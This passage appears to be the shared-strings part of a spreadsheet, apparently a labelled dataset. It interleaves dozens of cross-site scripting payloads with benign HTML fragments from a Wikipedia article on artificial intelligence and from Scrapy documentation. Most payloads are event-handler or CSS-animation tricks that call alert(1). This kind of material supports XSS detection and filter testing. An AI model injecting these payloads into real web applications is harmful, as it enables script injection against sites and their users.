    <t>&lt;nav onpointerup=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div style="clear: both;"&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;html onblur=alert(1) tabindex=1 id=x&gt;&lt;/html&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onbeforepaste="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;i id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;Breadth of commonsense knowledge &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;base style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;" &lt;/a&gt;. &lt;i&gt;The Washington Post &lt;/i&gt;. &lt;a href="/wiki/International_Standard_Serial_Number" title="International Standard Serial Number"&gt;ISSN &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/issn/0190-8286"&gt;0190-8286 &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030054330/https://www.washingtonpost.com/news/the-switch/wp/2015/01/28/bill-gates-on-dangers-of-artificial-intelligence-dont-understand-why-some-people-are-not-concerned/"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;frameset onpointerenter=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="basic-concepts"&gt;</t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www.fastcompany.com/3041007/fast-feed/elon-musk-is-donating-10m-of-his-own-money-to-artificial-intelligence-research"&gt;"Elon Musk Is Donating $10M Of His Own Money To Artificial Intelligence Research" &lt;/a&gt;. &lt;i&gt;Fast Company &lt;/i&gt;. 15 January 2015. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030202356/http://www.fastcompany.com/3041007/fast-feed/elon-musk-is-donating-10m-of-his-own-money-to-artificial-intelligence-research"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;details onkeypress="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;link onmousemove="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerenter=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmouseenter="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmousedown="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset draggable="true" ondragenter="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;section oncut="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHofstadter1979"&gt;Hofstadter 1979 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;tr onpointerenter=alert(1)&gt;XSS&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerdown=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Metaheuristic" title="Metaheuristic"&gt;Metaheuristic methods &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerenter=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body ontouchmove=alert(1)&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;time style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>javascript:alert('')</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Use it on extensions and middlewares to extend Scrapy functionality&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &amp;#8211; via Victoria University of Wellington. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Press&amp;amp;rft.atitle=Darwin+among+the+Machines&amp;amp;rft.date=1863-06-13&amp;amp;rft.aulast=Butler&amp;amp;rft.aufirst=Samuel&amp;amp;rft_id=http%3A%2F%2Fwww.nzetc.org%2Ftm%2Fscholarly%2Ftei-ButFir-t1-g1-t1-g1-t4-body.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;aside onbeforepaste="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;b id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Motion_and_manipulation"&gt;Motion and manipulation </t>
  </si>
  <si>
    <t>&lt;q onmouseout="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-148" class="reference"&gt;&lt;a href="#cite_note-148"&gt;&amp;#91;145&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dt&gt;On Read the Docs&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;One concern is that AI programs may be programmed to be biased against certain groups, such as women and minorities, because most of the developers are wealthy Caucasian men.&lt;sup id="cite_ref-382" class="reference"&gt;&lt;a href="#cite_note-382"&gt;&amp;#91;371&amp;#93; &lt;/a&gt; &lt;/sup&gt; Support for artificial intelligence is higher among men (with 47% approving) than women (35% approving).</t>
  </si>
  <si>
    <t>&lt;slot onmouseleave="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Sergei_P._Kurdyumov" title="Sergei P. Kurdyumov"&gt;Sergei P. Kurdyumov &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2F978-3-319-16595-0_10"&gt;10.1007/978-3-319-16595-0_10 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-3-319-16594-3" title="Special:BookSources/978-3-319-16594-3"&gt;&lt;bdi&gt;978-3-319-16594-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Real-Time+Predictive+Modeling+and+Robust+Avoidance+of+Pedestrians+with+Uncertain%2C+Changing+Intentions&amp;amp;rft.series=Springer+Tracts+in+Advanced+Robotics&amp;amp;rft.pages=161-177&amp;amp;rft.pub=Springer%2C+Cham&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Aarxiv%2F1405.5581&amp;amp;rft_id=info%3Adoi%2F10.1007%2F978-3-319-16595-0_10&amp;amp;rft.isbn=978-3-319-16594-3&amp;amp;rft.aulast=Ferguson&amp;amp;rft.aufirst=Sarah&amp;amp;rft.au=Luders%2C+Brandon&amp;amp;rft.au=Grande%2C+Robert+C.&amp;amp;rft.au=How%2C+Jonathan+P.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;picture draggable="true" ondragend="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;u oncontextmenu="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;small oncontextmenu="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Igor_Aleksander" title="Igor Aleksander"&gt;Igor Aleksander &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/datalist&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tt oncontextmenu="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Garbage_collection_(computer_science)" title="Garbage collection (computer science)"&gt;Garbage collection &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;address draggable="true" ondragenter="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;table style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Adjust crawl rate dynamically based on load.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmouseout="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Information_security" title="Information security"&gt;Information security &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Commonsense_knowledge_(artificial_intelligence)" title="Commonsense knowledge (artificial intelligence)"&gt;Commonsense knowledge &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Algorithm" title="Algorithm"&gt;Algorithms &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;736–748, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;big ondblclick="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;br onmouseup="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;source id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerover=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;keygen ondragover=alert(1) contenteditable&gt;drop here&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointermove=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>Prematurity of:</t>
  </si>
  <si>
    <t>&lt;div id="p-variants" role="navigation" class="vectorMenu emptyPortlet" aria-labelledby="p-variants-label"&gt;</t>
  </si>
  <si>
    <t>&lt;dd onclick="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;script type="text/javascript" src="_static/js/modernizr.min.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;marquee draggable="true" ondragleave="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;div onpointerover=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/source&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;input oncut=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Multithreading_(computer_architecture)" title="Multithreading (computer architecture)"&gt;Multithreading &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;thead oncut="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFSearle1980"&gt;Searle 1980 &lt;/a&gt;. Searle's original presentation of the thought experiment. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;pre draggable="true" ondragleave="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDennett1991" class="citation book"&gt;&lt;a href="/wiki/Daniel_Dennett" title="Daniel Dennett"&gt;Dennett, Daniel &lt;/a&gt; (1991). &lt;a href="/wiki/Consciousness_Explained" title="Consciousness Explained"&gt;&lt;i&gt;Consciousness Explained &lt;/i&gt; &lt;/a&gt;. The Penguin Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7139-9037-9" title="Special:BookSources/978-0-7139-9037-9"&gt;&lt;bdi&gt;978-0-7139-9037-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Consciousness+Explained&amp;amp;rft.pub=The+Penguin+Press&amp;amp;rft.date=1991&amp;amp;rft.isbn=978-0-7139-9037-9&amp;amp;rft.aulast=Dennett&amp;amp;rft.aufirst=Daniel&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;optgroup style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;summary onclick="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite id="CITEREFTuring1948" class="citation"&gt;&lt;a href="/wiki/Alan_Turing" title="Alan Turing"&gt;Turing, Alan &lt;/a&gt; (1948), "Machine Intelligence",  in Copeland, B. Jack (ed.), &lt;i&gt;The Essential Turing: The ideas that gave birth to the computer age &lt;/i&gt;, Oxford: Oxford University Press, p.&amp;#160;412, &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-19-825080-7" title="Special:BookSources/978-0-19-825080-7"&gt;&lt;bdi&gt;978-0-19-825080-7 &lt;/bdi&gt; &lt;/a&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Machine+Intelligence&amp;amp;rft.btitle=The+Essential+Turing%3A+The+ideas+that+gave+birth+to+the+computer+age&amp;amp;rft.place=Oxford&amp;amp;rft.pages=412&amp;amp;rft.pub=Oxford+University+Press&amp;amp;rft.date=1948&amp;amp;rft.isbn=978-0-19-825080-7&amp;amp;rft.aulast=Turing&amp;amp;rft.aufirst=Alan&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/basefont&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://www.vox.com/2014/8/22/6043635/5-reasons-we-shouldnt-worry-about-super-intelligent-computers-taking"&gt;"Will artificial intelligence destroy humanity? Here are 5 reasons not to worry" &lt;/a&gt;. &lt;i&gt;Vox &lt;/i&gt;. 22 August 2014. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030092203/http://www.vox.com/2014/8/22/6043635/5-reasons-we-shouldnt-worry-about-super-intelligent-computers-taking"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpointerleave=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/colgroup&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;rtc id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Proposals and&lt;br /&gt;implementations &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Many problems in AI can be solved in theory by intelligently searching through many possible solutions:&lt;sup id="cite_ref-Search_185-0" class="reference"&gt;&lt;a href="#cite_note-Search-185"&gt;&amp;#91;181&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="#Deduction,_reasoning,_problem_solving"&gt;Reasoning &lt;/a&gt; can be reduced to performing a search. For example, logical proof can be viewed as searching for a path that leads from &lt;a href="/wiki/Premise" title="Premise"&gt;premises &lt;/a&gt; to &lt;a href="/wiki/Logical_consequence" title="Logical consequence"&gt;conclusions &lt;/a&gt;, where each step is the application of an &lt;a href="/wiki/Inference_rule" class="mw-redirect" title="Inference rule"&gt;inference rule &lt;/a&gt;.&lt;sup id="cite_ref-Logic_as_search_186-0" class="reference"&gt;&lt;a href="#cite_note-Logic_as_search-186"&gt;&amp;#91;182&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;Planning &lt;/a&gt; algorithms search through trees of goals and subgoals, attempting to find a path to a target goal, a process called &lt;a href="/wiki/Means-ends_analysis" title="Means-ends analysis"&gt;means-ends analysis &lt;/a&gt;.&lt;sup id="cite_ref-Planning_as_search_187-0" class="reference"&gt;&lt;a href="#cite_note-Planning_as_search-187"&gt;&amp;#91;183&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Robotics" title="Robotics"&gt;Robotics &lt;/a&gt; algorithms for moving limbs and grasping objects use &lt;a href="/wiki/Local_search_(optimization)" title="Local search (optimization)"&gt;local searches &lt;/a&gt; in &lt;a href="/wiki/Configuration_space_(physics)" title="Configuration space (physics)"&gt;configuration space &lt;/a&gt;.&lt;sup id="cite_ref-Configuration_space_129-1" class="reference"&gt;&lt;a href="#cite_note-Configuration_space-129"&gt;&amp;#91;126&amp;#93; &lt;/a&gt; &lt;/sup&gt; Many &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt; algorithms use search algorithms based on &lt;a href="/wiki/Optimization_(mathematics)" class="mw-redirect" title="Optimization (mathematics)"&gt;optimization &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;audio ondrop=alert(1) contenteditable&gt;drop here&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;bdi draggable="true" ondragstart="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpaste="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerdown=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;link draggable="true" ondrag="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>Optimism of early AI:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotic_process_automation" title="Robotic process automation"&gt;Robotic process automation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;head onpaste="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; on 26 September 2007. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=AI+Magazine&amp;amp;rft.atitle=A+%28Very%29+Brief+History+of+Artificial+Intelligence&amp;amp;rft.pages=53-60&amp;amp;rft.date=2005&amp;amp;rft.aulast=Buchanan&amp;amp;rft.aufirst=Bruce+G.&amp;amp;rft_id=http%3A%2F%2Fwww.aaai.org%2FAITopics%2Fassets%2FPDF%2FAIMag26-04-016.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;small draggable="true" ondragleave="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmousedown="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmouseout="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;style id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=IKEA+furniture+and+the+limits+of+AI&amp;amp;rft.date=2018&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fleaders%2F21740735-humans-have-had-good-run-most-recent-breakthrough-robotics-it-clear&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The field was founded on the assumption that &lt;a href="/wiki/Human_intelligence" title="Human intelligence"&gt;human intelligence &lt;/a&gt; "can be so precisely described that a machine can be made to simulate it".&lt;sup id="cite_ref-20" class="reference"&gt;&lt;a href="#cite_note-20"&gt;&amp;#91;20&amp;#93; &lt;/a&gt; &lt;/sup&gt; This raises philosophical arguments about the nature of the &lt;a href="/wiki/Mind" title="Mind"&gt;mind &lt;/a&gt; and the ethics of creating artificial beings endowed with human-like intelligence. These issues have been explored by &lt;a href="/wiki/History_of_AI#AI_in_myth,_fiction_and_speculation" class="mw-redirect" title="History of AI"&gt;myth &lt;/a&gt;, &lt;a href="/wiki/Artificial_intelligence_in_fiction" title="Artificial intelligence in fiction"&gt;fiction &lt;/a&gt; and &lt;a href="/wiki/Philosophy_of_AI" class="mw-redirect" title="Philosophy of AI"&gt;philosophy &lt;/a&gt; since &lt;a href="/wiki/Ancient_history" title="Ancient history"&gt;antiquity &lt;/a&gt;.&lt;sup id="cite_ref-McCorduck&amp;#39;s_thesis_21-0" class="reference"&gt;&lt;a href="#cite_note-McCorduck&amp;#39;s_thesis-21"&gt;&amp;#91;21&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some people also consider AI to be &lt;a href="/wiki/Existential_risk" class="mw-redirect" title="Existential risk"&gt;a danger to humanity &lt;/a&gt; if it progresses unabated.&lt;sup id="cite_ref-22" class="reference"&gt;&lt;a href="#cite_note-22"&gt;&amp;#91;22&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-pmid31835078_23-0" class="reference"&gt;&lt;a href="#cite_note-pmid31835078-23"&gt;&amp;#91;23&amp;#93; &lt;/a&gt; &lt;/sup&gt; Others believe that AI, unlike previous technological revolutions, will create a &lt;a href="/wiki/Technological_unemployment#21st_century" title="Technological unemployment"&gt;risk of mass unemployment &lt;/a&gt;.&lt;sup id="cite_ref-guardian_jobs_debate_24-0" class="reference"&gt;&lt;a href="#cite_note-guardian_jobs_debate-24"&gt;&amp;#91;24&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 onfocus=alert(1)&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;html onload=alert(1)&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerup=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;abbr draggable="true" ondragenter="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;label onmousemove="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;html onkeyup="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerover=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      Free document hosting provided by &lt;a href="http://www.readthedocs.org"&gt;Read the Docs&lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;image3 onpointerdown=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;IMG onmouseover="alert('xxs')"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div class="body"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;span class="mw-editsection-bracket"&gt;[ </t>
  </si>
  <si>
    <t>&lt;area onmouseenter="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;title onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/title&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="History_of_AI"&gt;History of AI </t>
  </si>
  <si>
    <t>&lt;frameset onmouseout="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;track style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;meta onbeforecut="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpointerdown=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/broad-crawls.html"&gt;&lt;span class="doc"&gt;Broad Crawls</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Creative_synthesis" title="Creative synthesis"&gt;Creative synthesis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;multicol id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmouseenter="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
